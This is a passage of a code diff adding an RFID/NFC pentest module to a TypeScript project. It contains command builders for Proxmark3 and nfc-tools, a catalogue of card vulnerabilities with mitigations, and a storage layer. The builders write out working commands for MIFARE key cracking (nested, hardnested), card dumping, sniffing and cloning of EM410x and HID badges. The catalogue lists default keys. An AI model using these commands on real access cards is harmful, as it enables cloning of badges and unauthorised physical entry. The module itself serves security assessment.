+      supportsLF: caps.includes("lf"),
+      supportsHF: caps.includes("hf"),
+      supportsISO14443A: caps.includes("iso14443a"),
+      supportsISO14443B: caps.includes("iso14443b"),
+      supportsISO15693: caps.includes("iso15693"),
+      supportsNFC: caps.includes("hf") || caps.includes("iso14443a"),
+      supportsMifareClassic:
+        caps.includes("iso14443a") || reader.type === "proxmark3",
+      supportsEmulation:
+        reader.type === "proxmark3" || reader.type === "chameleon",
+      supportsSniffing: reader.type === "proxmark3",
+    }
+  }
+
+  // ========== Reader-Specific Commands ==========
+
+  /**
+   * Proxmark3 command builders.
+   */
+  export const Proxmark3Commands = {
+    // HF commands
+    hfSearch: "hf search",
+    hf14aReader: "hf 14a reader",
+    hfMfInfo: "hf mf info",
+    hfMfChk: (keyType: "A" | "B", block: number, key: string) =>
+      `hf mf chk --${keyType.toLowerCase()} -k ${key} --blk ${block}`,
+    hfMfDump: "hf mf dump",
+    hfMfRestore: (file: string) => `hf mf restore -f ${file}`,
+    hfMfNested: (block: number, keyType: "A" | "B", key: string) =>
+      `hf mf nested --${keyType.toLowerCase()}key ${key} --blk ${block}`,
+    hfMfHardnested: (
+      srcBlock: number,
+      srcKey: string,
+      tgtBlock: number,
+      keyType: "A" | "B"
+    ) =>
+      `hf mf hardnested --blk ${srcBlock} -k ${srcKey} --tblk ${tgtBlock} --t${keyType.toLowerCase()}`,
+    hfMfSim: (uid: string) => `hf mf sim -u ${uid}`,
+
+    // LF commands
+    lfSearch: "lf search",
+    lfRead: "lf read",
+    lfEmSearch: "lf em 410x reader",
+    lfHidRead: "lf hid read",
+    lfT55xxDetect: "lf t55xx detect",
+    lfT55xxWrite: (block: number, data: string) =>
+      `lf t55xx write -b ${block} -d ${data}`,
+    lfEmClone: (id: string) => `lf em 410x clone --id ${id}`,
+    lfHidClone: (fc: number, cn: number) =>
+      `lf hid clone -w H10301 --fc ${fc} --cn ${cn}`,
+
+    // Sniffing
+    hfSniff: "hf sniff",
+    lfSniff: "lf sniff",
+  }
+
+  /**
+   * NFC-tools command builders.
+   */
+  export const NFCToolsCommands = {
+    list: "nfc-list",
+    poll: "nfc-poll",
+    mfclassic: {
+      read: (keyFile: string, dumpFile: string) =>
+        `mfoc -f ${keyFile} -O ${dumpFile}`,
+      write: (dumpFile: string) => `nfc-mfclassic w a ${dumpFile}`,
+    },
+    mfUltralight: {
+      read: "nfc-mfultralight r dump.mfd",
+      write: (file: string) => `nfc-mfultralight w ${file}`,
+    },
+  }
+
+  // ========== Reader Status ==========
+
+  /**
+   * Check reader connection status.
+   */
+  export async function checkReaderStatus(
+    reader: WirelessScanTypes.RFIDReader,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{
+    connected: boolean
+    firmware?: string
+    error?: string
+  }> {
+    switch (reader.type) {
+      case "proxmark3": {
+        const result = await executeProxmark3Command("hw version", reader.port, execCommand)
+        if (result.success) {
+          const fwMatch = result.output.match(/firmware[:\s]+([^\n]+)/i)
+          return {
+            connected: true,
+            firmware: fwMatch?.[1]?.trim(),
+          }
+        }
+        return { connected: false, error: result.error }
+      }
+
+      case "acr122u":
+      case "pn532": {
+        const result = await executeNFCCommand("nfc-list", "", execCommand)
+        return {
+          connected: result.success && result.output.includes("NFC device"),
+          error: result.success ? undefined : result.error,
+        }
+      }
+
+      default:
+        return { connected: false, error: "Unknown reader type" }
+    }
+  }
+
+  // ========== Reader Information ==========
+
+  /**
+   * Reader type information.
+   */
+  export const READER_INFO: Record<
+    WirelessScanTypes.RFIDReader["type"],
+    {
+      name: string
+      description: string
+      frequencies: string[]
+      protocols: string[]
+      features: string[]
+    }
+  > = {
+    proxmark3: {
+      name: "Proxmark3",
+      description: "Advanced RFID research tool supporting LF and HF frequencies",
+      frequencies: ["125 kHz", "134 kHz", "13.56 MHz"],
+      protocols: [
+        "ISO14443A/B",
+        "ISO15693",
+        "EM4x",
+        "HID",
+        "Indala",
+        "AWID",
+        "T55xx",
+      ],
+      features: [
+        "Reading",
+        "Writing",
+        "Emulation",
+        "Sniffing",
+        "Cloning",
+        "Key cracking",
+      ],
+    },
+    acr122u: {
+      name: "ACR122U",
+      description: "PC/SC compliant NFC reader for 13.56 MHz cards",
+      frequencies: ["13.56 MHz"],
+      protocols: ["ISO14443A/B", "FeliCa", "MIFARE"],
+      features: ["Reading", "Writing", "Basic emulation"],
+    },
+    pn532: {
+      name: "PN532",
+      description: "NXP NFC controller module",
+      frequencies: ["13.56 MHz"],
+      protocols: ["ISO14443A/B", "FeliCa", "MIFARE", "NTAG"],
+      features: ["Reading", "Writing", "Card emulation"],
+    },
+    chameleon: {
+      name: "Chameleon Mini/Tiny",
+      description: "Contactless smartcard emulator",
+      frequencies: ["13.56 MHz"],
+      protocols: ["ISO14443A", "MIFARE"],
+      features: ["Emulation", "Sniffing", "Cloning", "Multiple slot storage"],
+    },
+    flipper: {
+      name: "Flipper Zero",
+      description: "Multi-protocol hacking device",
+      frequencies: ["125 kHz", "13.56 MHz"],
+      protocols: ["ISO14443A", "EM4x", "HID", "MIFARE", "NTAG"],
+      features: ["Reading", "Emulation", "Cloning"],
+    },
+    other: {
+      name: "Unknown Reader",
+      description: "Unidentified RFID reader",
+      frequencies: ["Unknown"],
+      protocols: ["Unknown"],
+      features: ["Reading"],
+    },
+  }
+
+  /**
+   * Get reader information.
+   */
+  export function getReaderInfo(
+    type: WirelessScanTypes.RFIDReader["type"]
+  ): (typeof READER_INFO)[keyof typeof READER_INFO] {
+    return READER_INFO[type] || READER_INFO.other
+  }
+
+  // ========== Format Functions ==========
+
+  /**
+   * Format reader list for display.
+   */
+  export function formatReaderList(
+    readers: WirelessScanTypes.RFIDReader[]
+  ): string {
+    if (readers.length === 0) {
+      return "No RFID readers detected."
+    }
+
+    const lines: string[] = ["Detected RFID Readers:", ""]
+
+    for (const reader of readers) {
+      const info = getReaderInfo(reader.type)
+      lines.push(`${reader.name}`)
+      lines.push(`  Type: ${info.name}`)
+      if (reader.port) lines.push(`  Port: ${reader.port}`)
+      lines.push(`  Status: ${reader.connected ? "Connected" : "Disconnected"}`)
+      lines.push(`  Capabilities: ${reader.capabilities.join(", ")}`)
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/vulnerabilities.ts b/packages/opencode/src/pentest/wirelessscan/rfid/vulnerabilities.ts
new file mode 100644
index 00000000000..b3965199cda
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/vulnerabilities.ts
@@ -0,0 +1,438 @@
+/**
+ * @fileoverview RFID/NFC Vulnerability Checks
+ *
+ * Known RFID/NFC vulnerability detection and assessment.
+ *
+ * @module pentest/wirelessscan/rfid/vulnerabilities
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+import { RFIDCards } from "./cards"
+
+/**
+ * RFID vulnerabilities namespace.
+ */
+export namespace RFIDVulnerabilities {
+  // ========== Vulnerability Definitions ==========
+
+  /**
+   * Vulnerability definition.
+   */
+  export interface VulnerabilityDefinition {
+    id: string
+    name: string
+    affectedTypes: WirelessScanTypes.RFIDTagType[]
+    severity: WirelessScanTypes.Severity
+    description: string
+    impact: string
+    detection: string
+    mitigation: string
+    references: string[]
+  }
+
+  /**
+   * Known RFID/NFC vulnerabilities.
+   */
+  export const VULNERABILITIES: VulnerabilityDefinition[] = [
+    {
+      id: "crypto1_weakness",
+      name: "MIFARE Classic Crypto1 Weakness",
+      affectedTypes: ["mifare-classic-1k", "mifare-classic-4k"],
+      severity: "critical",
+      description:
+        "The Crypto1 cipher used in MIFARE Classic has been completely broken. Keys can be recovered through various attacks including nested authentication, darkside, and hardnested attacks.",
+      impact:
+        "Complete compromise of card data. Keys can be recovered without physical access to a legitimate reader. Cards can be cloned.",
+      detection: "Identified as MIFARE Classic card type through SAK byte",
+      mitigation:
+        "Migrate to MIFARE DESFire EV2/EV3 or MIFARE Plus in SL3 mode. Implement backend validation to detect cloned credentials.",
+      references: [
+        "https://www.cs.ru.nl/~flaviog/papers/Dismantling.Mifare.pdf",
+        "https://eprint.iacr.org/2008/166.pdf",
+        "https://github.com/RfidResearchGroup/proxmark3",
+      ],
+    },
+    {
+      id: "default_keys",
+      name: "Default MIFARE Keys",
+      affectedTypes: ["mifare-classic-1k", "mifare-classic-4k"],
+      severity: "high",
+      description:
+        "Card sectors are protected with default/well-known keys. These include FFFFFFFFFFFF, A0A1A2A3A4A5, and other common defaults.",
+      impact:
+        "Immediate read/write access to protected sectors without any key recovery attacks needed.",
+      detection: "Automated key checking against known default key list",
+      mitigation:
+        "Replace all default keys with unique, randomly generated keys. Use key diversification based on UID.",
+      references: [
+        "https://github.com/RfidResearchGroup/proxmark3/blob/master/client/dictionaries/mf_default_keys.dic",
+      ],
+    },
+    {
+      id: "no_encryption",
+      name: "Unencrypted RFID Card",
+      affectedTypes: ["em4100", "em4102", "hid-prox", "indala", "awid"],
+      severity: "critical",
+      description:
+        "Card uses no encryption. The card ID is transmitted in plaintext and can be captured by any compatible reader.",
+      impact:
+        "Card can be trivially cloned by anyone with basic equipment. No authentication required.",
+      detection: "Identified by card type and protocol",
+      mitigation:
+        "Upgrade to encrypted card technology such as MIFARE DESFire, HID iCLASS SE, or SEOS. Implement multi-factor authentication.",
+      references: [
+        "https://www.bishopfox.com/blog/2017/01/rfid-hacking-intro/",
+      ],
+    },
+    {
+      id: "weak_ntag_password",
+      name: "Weak NTAG Password Protection",
+      affectedTypes: ["ntag213", "ntag215", "ntag216"],
+      severity: "medium",
+      description:
+        "NTAG uses a 32-bit password which can be brute-forced. If password protection is not enabled, data is freely accessible.",
+      impact:
+        "Password can be brute-forced in reasonable time. Data can be read/modified if password is weak or not set.",
+      detection: "Attempt read without password, check for password protection configuration",
+      mitigation:
+        "Enable password protection with a strong random password. Use signature verification. Implement backend validation.",
+      references: [
+        "https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf",
+      ],
+    },
+    {
+      id: "replay_attack",
+      name: "Replay Attack Vulnerability",
+      affectedTypes: [
+        "em4100",
+        "em4102",
+        "hid-prox",
+        "mifare-ultralight",
+        "ntag213",
+        "ntag215",
+        "ntag216",
+      ],
+      severity: "high",
+      description:
+        "Cards without challenge-response authentication are vulnerable to replay attacks. A captured credential can be replayed indefinitely.",
+      impact:
+        "Captured credentials remain valid forever. No way to detect or prevent replay without backend validation.",
+      detection: "Card type analysis and protocol inspection",
+      mitigation:
+        "Use cards with challenge-response authentication. Implement time-based or counter-based tokens. Add backend validation.",
+      references: [],
+    },
+    {
+      id: "uid_only_auth",
+      name: "UID-Only Authentication",
+      affectedTypes: [
+        "em4100",
+        "em4102",
+        "hid-prox",
+        "mifare-ultralight",
+        "mifare-classic-1k",
+        "mifare-classic-4k",
+      ],
+      severity: "high",
+      description:
+        "System relies only on the card UID for authentication. UIDs are not secret and can be easily captured or predicted.",
+      impact:
+        "UID can be captured without physical contact. Many magic cards allow arbitrary UID programming.",
+      detection: "Analysis of access control system behavior",
+      mitigation:
+        "Implement proper cryptographic authentication. Use diversified keys. Validate additional data beyond UID.",
+      references: [],
+    },
+    {
+      id: "magic_card_vulnerable",
+      name: "Accepts Magic Card Clones",
+      affectedTypes: ["mifare-classic-1k", "mifare-classic-4k"],
+      severity: "high",
+      description:
+        "Reader accepts magic MIFARE cards (with writable block 0/UID). These cards can perfectly clone any MIFARE Classic.",
+      impact:
+        "Perfect clones can be created. No way to distinguish clone from original based on UID.",
+      detection: "Test with known magic card",
+      mitigation:
+        "Implement reader-side detection of magic cards. Migrate to MIFARE DESFire. Use credential monitoring.",
+      references: [],
+    },
+    {
+      id: "lack_diversification",
+      name: "Non-Diversified Keys",
+      affectedTypes: ["mifare-classic-1k", "mifare-classic-4k", "mifare-desfire"],
+      severity: "medium",
+      description:
+        "All cards in the system use the same keys. Compromising one card compromises all cards.",
+      impact:
+        "Single card compromise leads to system-wide key exposure. No card can be revoked without re-keying all cards.",
+      detection: "Compare keys across multiple cards",
+      mitigation:
+        "Implement key diversification using UID or other unique identifier. Use per-card or per-sector unique keys.",
+      references: [
+        "https://www.nxp.com/docs/en/application-note/AN10922.pdf",
+      ],
+    },
+  ]
+
+  // ========== Vulnerability Checking ==========
+
+  /**
+   * Check tag for known vulnerabilities.
+   */
+  export function checkVulnerabilities(
+    tag: WirelessScanTypes.RFIDTag,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const vuln of VULNERABILITIES) {
+      if (!vuln.affectedTypes.includes(tag.type)) {
+        continue
+      }
+
+      // Check specific conditions
+      if (shouldReportVulnerability(tag, vuln)) {
+        const finding = createVulnerabilityFinding(tag, vuln, scanId)
+        findings.push(finding)
+
+        Bus.publish(WirelessScanEvents.RFIDVulnerable, {
+          scanId,
+          uid: tag.uid,
+          type: tag.type,
+          vulnerability: vuln.name,
+          defaultKeys: vuln.id === "default_keys",
+        })
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Check if vulnerability should be reported for this tag.
+   */
+  function shouldReportVulnerability(
+    tag: WirelessScanTypes.RFIDTag,
+    vuln: VulnerabilityDefinition
+  ): boolean {
+    switch (vuln.id) {
+      case "crypto1_weakness":
+        // Always report for MIFARE Classic
+        return true
+
+      case "default_keys":
+        // Report if default keys flag is set
+        return tag.defaultKeys === true
+
+      case "no_encryption":
+        // Always report for unencrypted types
+        return true
+
+      case "weak_ntag_password":
+        // Report if not password protected
+        return !tag.passwordProtected
+
+      case "replay_attack":
+        // Report for vulnerable types
+        return true
+
+      case "uid_only_auth":
+        // This requires system analysis, report as informational
+        return true
+
+      case "magic_card_vulnerable":
+        // Report for MIFARE Classic
+        return tag.type.includes("mifare-classic")
+
+      case "lack_diversification":
+        // This requires multiple cards to detect
+        return false
+
+      default:
+        return false
+    }
+  }
+
+  /**
+   * Create vulnerability finding.
+   */
+  function createVulnerabilityFinding(
+    tag: WirelessScanTypes.RFIDTag,
+    vuln: VulnerabilityDefinition,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding {
+    const cardInfo = RFIDCards.getCardInfo(tag.type)
+
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "rfid",
+      category: "vulnerability",
+      severity: vuln.severity,
+      title: vuln.name,
+      description: `${cardInfo.name} card (UID: ${tag.uid}) is affected by ${vuln.name}. ${vuln.description}`,
+      target: {
+        type: "tag",
+        identifier: tag.uid,
+        name: cardInfo.name,
+      },
+      vulnerability: vuln.name,
+      recommendation: vuln.mitigation,
+      references: vuln.references,
+      evidence: `Card type: ${tag.type}, Protocol: ${tag.protocol}`,
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Vulnerability Lookup ==========
+
+  /**
+   * Get vulnerability by ID.
+   */
+  export function getVulnerability(id: string): VulnerabilityDefinition | undefined {
+    return VULNERABILITIES.find((v) => v.id === id)
+  }
+
+  /**
+   * Get vulnerabilities for a card type.
+   */
+  export function getVulnerabilitiesForType(
+    type: WirelessScanTypes.RFIDTagType
+  ): VulnerabilityDefinition[] {
+    return VULNERABILITIES.filter((v) => v.affectedTypes.includes(type))
+  }
+
+  /**
+   * Get critical vulnerabilities.
+   */
+  export function getCriticalVulnerabilities(): VulnerabilityDefinition[] {
+    return VULNERABILITIES.filter((v) => v.severity === "critical")
+  }
+
+  // ========== Key Testing ==========
+
+  /**
+   * Test for default keys on MIFARE Classic.
+   */
+  export async function testDefaultKeys(
+    tag: WirelessScanTypes.RFIDTag,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{
+    hasDefaultKeys: boolean
+    foundKeys: { sector: number; keyType: "A" | "B"; key: string }[]
+  }> {
+    const foundKeys: { sector: number; keyType: "A" | "B"; key: string }[] = []
+
+    if (!tag.type.includes("mifare-classic")) {
+      return { hasDefaultKeys: false, foundKeys }
+    }
+
+    // Run key check with Proxmark3
+    const result = await execCommand(
+      `proxmark3 -c "hf mf chk --1k" 2>&1 || true`
+    )
+
+    if (result.stdout) {
+      // Parse found keys from output
+      const keyMatches = result.stdout.matchAll(
+        /sector\s+(\d+).*?key\s*([AB]).*?([0-9A-Fa-f]{12})/gi
+      )
+
+      for (const match of keyMatches) {
+        foundKeys.push({
+          sector: parseInt(match[1], 10),
+          keyType: match[2].toUpperCase() as "A" | "B",
+          key: match[3].toUpperCase(),
+        })
+      }
+    }
+
+    // Check against default key list
+    const defaultKeyList = RFIDCards.getDefaultKeys(tag.type)
+    const hasDefaultKeys = foundKeys.some((fk) =>
+      defaultKeyList.includes(fk.key)
+    )
+
+    return { hasDefaultKeys, foundKeys }
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get vulnerability statistics.
+   */
+  export function getStats(): {
+    total: number
+    bySeverity: Record<string, number>
+    byCardType: Record<string, number>
+  } {
+    const bySeverity: Record<string, number> = {}
+    const byCardType: Record<string, number> = {}
+
+    for (const vuln of VULNERABILITIES) {
+      bySeverity[vuln.severity] = (bySeverity[vuln.severity] || 0) + 1
+
+      for (const type of vuln.affectedTypes) {
+        byCardType[type] = (byCardType[type] || 0) + 1
+      }
+    }
+
+    return {
+      total: VULNERABILITIES.length,
+      bySeverity,
+      byCardType,
+    }
+  }
+
+  // ========== Reporting ==========
+
+  /**
+   * Generate vulnerability report for a tag.
+   */
+  export function generateReport(
+    tag: WirelessScanTypes.RFIDTag,
+    findings: WirelessScanTypes.WirelessFinding[]
+  ): string {
+    const cardInfo = RFIDCards.getCardInfo(tag.type)
+    const lines: string[] = []
+
+    lines.push(`RFID Security Report: ${cardInfo.name}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`UID: ${tag.uid}`)
+    lines.push(`Type: ${cardInfo.name}`)
+    lines.push(`Frequency: ${tag.frequency}`)
+    lines.push(`Protocol: ${tag.protocol}`)
+    lines.push(`Base Security: ${cardInfo.securityLevel}`)
+    lines.push("")
+
+    if (findings.length === 0) {
+      lines.push("No specific vulnerabilities detected.")
+    } else {
+      lines.push(`Vulnerabilities Found: ${findings.length}`)
+      lines.push("")
+
+      for (const finding of findings) {
+        lines.push(`[${finding.severity.toUpperCase()}] ${finding.title}`)
+        lines.push(`  ${finding.description.slice(0, 100)}...`)
+        lines.push(`  Recommendation: ${finding.recommendation.slice(0, 100)}...`)
+        lines.push("")
+      }
+    }
+
+    lines.push("General Recommendations:")
+    lines.push("  1. Inventory all RFID credentials in use")
+    lines.push("  2. Plan migration path for vulnerable card types")
+    lines.push("  3. Implement backend validation where possible")
+    lines.push("  4. Consider multi-factor authentication")
+    lines.push("  5. Regular security assessments of physical access")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/storage.ts b/packages/opencode/src/pentest/wirelessscan/storage.ts
new file mode 100644
index 00000000000..cdb5a4b848a
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/storage.ts
@@ -0,0 +1,452 @@
+/**
+ * @fileoverview Wireless Scanner Storage
+ *
+ * Persistence layer for wireless scan data with dual-backend support.
+ *
+ * @module pentest/wirelessscan/storage
+ */
+
+import { WirelessScanTypes } from "./types"
+import { Storage } from "../../storage/storage"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "wirelessscan.storage" })
+
+/**
+ * Wireless scanner storage namespace.
+ */
+export namespace WirelessScanStorage {
+  // ========== Memory Buffers ==========
+
+  const scanBuffer: WirelessScanTypes.WirelessScanResult[] = []
+  const findingBuffer: WirelessScanTypes.WirelessFinding[] = []
+  const baselineBuffer: WirelessScanTypes.NetworkBaseline[] = []
+
+  // ========== ID Generation ==========
+
+  function generateScanId(): string {
+    return `wirelessscan_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  function generateFindingId(): string {
+    return `wfinding_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  function generateNetworkId(): string {
+    return `wnet_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  function generateDeviceId(): string {
+    return `wdev_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  function generateTagId(): string {
+    return `wtag_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  function generateBaselineId(): string {
+    return `wbaseline_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`
+  }
+
+  // ========== Scan Operations ==========
+
+  /**
+   * Save scan result.
+   */
+  export async function saveScan(
+    scan: WirelessScanTypes.WirelessScanResult,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<void> {
+    log.debug("Saving scan", { scanId: scan.id, status: scan.status })
+
+    if (config.storage === "memory") {
+      const index = scanBuffer.findIndex((s) => s.id === scan.id)
+      if (index >= 0) {
+        scanBuffer[index] = scan
+      } else {
+        scanBuffer.push(scan)
+      }
+    } else {
+      await Storage.write(["pentest", "wirelessscan", "scans", `${scan.id}.json`], scan)
+    }
+  }
+
+  /**
+   * Get scan by ID.
+   */
+  export async function getScan(
+    scanId: string,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<WirelessScanTypes.WirelessScanResult | undefined> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === scanId)
+    }
+
+    try {
+      const data = await Storage.read<WirelessScanTypes.WirelessScanResult>([
+        "pentest",
+        "wirelessscan",
+        "scans",
+        `${scanId}.json`,
+      ])
+      return WirelessScanTypes.WirelessScanResult.parse(data)
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * List scans with optional filters.
+   */
+  export async function listScans(
+    config: WirelessScanTypes.StorageConfig = {},
+    filters?: {
+      profile?: WirelessScanTypes.ProfileId
+      status?: WirelessScanTypes.ScanStatus
+      limit?: number
+    }
+  ): Promise<WirelessScanTypes.WirelessScanResult[]> {
+    let scans: WirelessScanTypes.WirelessScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "wirelessscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<WirelessScanTypes.WirelessScanResult>(key)
+          scans.push(WirelessScanTypes.WirelessScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time descending
+    scans.sort((a, b) => b.startTime - a.startTime)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete scan.
+   */
+  export async function deleteScan(
+    scanId: string,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<boolean> {
+    if (config.storage === "memory") {
+      const index = scanBuffer.findIndex((s) => s.id === scanId)
+      if (index >= 0) {
+        scanBuffer.splice(index, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "wirelessscan", "scans", `${scanId}.json`])
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  // ========== Finding Operations ==========
+
+  /**
+   * Save finding.
+   */
+  export async function saveFinding(
+    finding: WirelessScanTypes.WirelessFinding,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<void> {
+    log.debug("Saving finding", { findingId: finding.id, severity: finding.severity })
+
+    if (config.storage === "memory") {
+      const index = findingBuffer.findIndex((f) => f.id === finding.id)
+      if (index >= 0) {
+        findingBuffer[index] = finding
+      } else {
+        findingBuffer.push(finding)
+      }
+    } else {
+      await Storage.write(["pentest", "wirelessscan", "findings", `${finding.id}.json`], finding)
+    }
+  }
+
+  /**
+   * List findings with optional filters.
+   */
+  export async function listFindings(
+    config: WirelessScanTypes.StorageConfig = {},
+    filters?: {
+      scanId?: string
+      wirelessType?: WirelessScanTypes.WirelessType
+      severity?: WirelessScanTypes.Severity
+      category?: WirelessScanTypes.FindingCategory
+      limit?: number
+    }
+  ): Promise<WirelessScanTypes.WirelessFinding[]> {
+    let findings: WirelessScanTypes.WirelessFinding[]
+
+    if (config.storage === "memory") {
+      findings = [...findingBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "wirelessscan", "findings"])
+      findings = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<WirelessScanTypes.WirelessFinding>(key)
+          findings.push(WirelessScanTypes.WirelessFinding.parse(data))
+        } catch {
+          log.warn("Failed to parse finding file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.scanId) {
+      findings = findings.filter((f) => f.scanId === filters.scanId)
+    }
+    if (filters?.wirelessType) {
+      findings = findings.filter((f) => f.wirelessType === filters.wirelessType)
+    }
+    if (filters?.severity) {
+      findings = findings.filter((f) => f.severity === filters.severity)
+    }
+    if (filters?.category) {
+      findings = findings.filter((f) => f.category === filters.category)
+    }
+
+    // Sort by severity
+    const severityOrder: Record<string, number> = { critical: 0, high: 1, medium: 2, low: 3, info: 4 }
+    findings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity])
+
+    // Apply limit
+    if (filters?.limit) {
+      findings = findings.slice(0, filters.limit)
+    }
+
+    return findings
+  }
+
+  // ========== Baseline Operations ==========
+
+  /**
+   * Save network baseline.
+   */
+  export async function saveBaseline(
+    baseline: WirelessScanTypes.NetworkBaseline,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<void> {
+    log.debug("Saving baseline", { baselineId: baseline.id, name: baseline.name })
+
+    if (config.storage === "memory") {
+      const index = baselineBuffer.findIndex((b) => b.id === baseline.id)
+      if (index >= 0) {
+        baselineBuffer[index] = baseline
+      } else {
+        baselineBuffer.push(baseline)
+      }
+    } else {
+      await Storage.write(["pentest", "wirelessscan", "baselines", `${baseline.id}.json`], baseline)
+    }
+  }
+
+  /**
+   * Get baseline by ID.
+   */
+  export async function getBaseline(
+    baselineId: string,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<WirelessScanTypes.NetworkBaseline | undefined> {
+    if (config.storage === "memory") {
+      return baselineBuffer.find((b) => b.id === baselineId)
+    }
+
+    try {
+      const data = await Storage.read<WirelessScanTypes.NetworkBaseline>([
+        "pentest",
+        "wirelessscan",
+        "baselines",
+        `${baselineId}.json`,
+      ])
+      return WirelessScanTypes.NetworkBaseline.parse(data)
+    } catch {
+      return undefined
+    }
+  }
+
+  /**
+   * List baselines.
+   */
+  export async function listBaselines(
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<WirelessScanTypes.NetworkBaseline[]> {
+    if (config.storage === "memory") {
+      return [...baselineBuffer]
+    }
+
+    const keys = await Storage.list(["pentest", "wirelessscan", "baselines"])
+    const baselines: WirelessScanTypes.NetworkBaseline[] = []
+
+    for (const key of keys) {
+      try {
+        const data = await Storage.read<WirelessScanTypes.NetworkBaseline>(key)
+        baselines.push(WirelessScanTypes.NetworkBaseline.parse(data))
+      } catch {
+        log.warn("Failed to parse baseline file", { key })
+      }
+    }
+
+    return baselines.sort((a, b) => b.updatedAt - a.updatedAt)
+  }
+
+  /**
+   * Delete baseline.
+   */
+  export async function deleteBaseline(
+    baselineId: string,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<boolean> {
+    if (config.storage === "memory") {
+      const index = baselineBuffer.findIndex((b) => b.id === baselineId)
+      if (index >= 0) {
+        baselineBuffer.splice(index, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "wirelessscan", "baselines", `${baselineId}.json`])
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  // ========== Memory Management ==========
+
+  /**
+   * Clear memory buffers.
+   */
+  export function clearMemory(): void {
+    scanBuffer.length = 0
+    findingBuffer.length = 0
+    baselineBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts.
+   */
+  export function memoryCount(): {
+    scans: number
+    findings: number
+    baselines: number
+  } {
+    return {
+      scans: scanBuffer.length,
+      findings: findingBuffer.length,
+      baselines: baselineBuffer.length,
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  /**
+   * Generate unique scan ID.
+   */
+  export function createScanId(): string {
+    return generateScanId()
+  }
+
+  /**
+   * Generate unique finding ID.
+   */
+  export function createFindingId(): string {
+    return generateFindingId()
+  }
+
+  /**
+   * Generate unique network ID.
+   */
+  export function createNetworkId(): string {
+    return generateNetworkId()
+  }
+
+  /**
+   * Generate unique device ID.
+   */
+  export function createDeviceId(): string {
+    return generateDeviceId()
+  }
+
+  /**
+   * Generate unique tag ID.
+   */
+  export function createTagId(): string {
+    return generateTagId()
+  }
+
+  /**
+   * Generate unique baseline ID.
+   */
+  export function createBaselineId(): string {
+    return generateBaselineId()
+  }
+
+  // ========== Orchestrator Compatibility ==========
+
+  /**
+   * Store scan result (alias for saveScan).
+   */
+  export async function storeScanResult(
+    scan: WirelessScanTypes.WirelessScanResult,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<void> {
+    return saveScan(scan, config)
+  }
+
+  /**
+   * Load baseline by type.
+   */
+  export async function loadBaseline(
+    type: string,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<WirelessScanTypes.NetworkBaseline | undefined> {
+    const baselines = await listBaselines(config)
+    // Find baseline by type (stored in name or return first matching)
+    return baselines.find((b) => b.name.toLowerCase().includes(type.toLowerCase())) || baselines[0]
+  }
+
+  /**
+   * Store baseline by type.
+   */
+  export async function storeBaseline(
+    type: string,
+    baseline: WirelessScanTypes.NetworkBaseline,
+    config: WirelessScanTypes.StorageConfig = {}
+  ): Promise<void> {
+    // Ensure baseline has the type in name
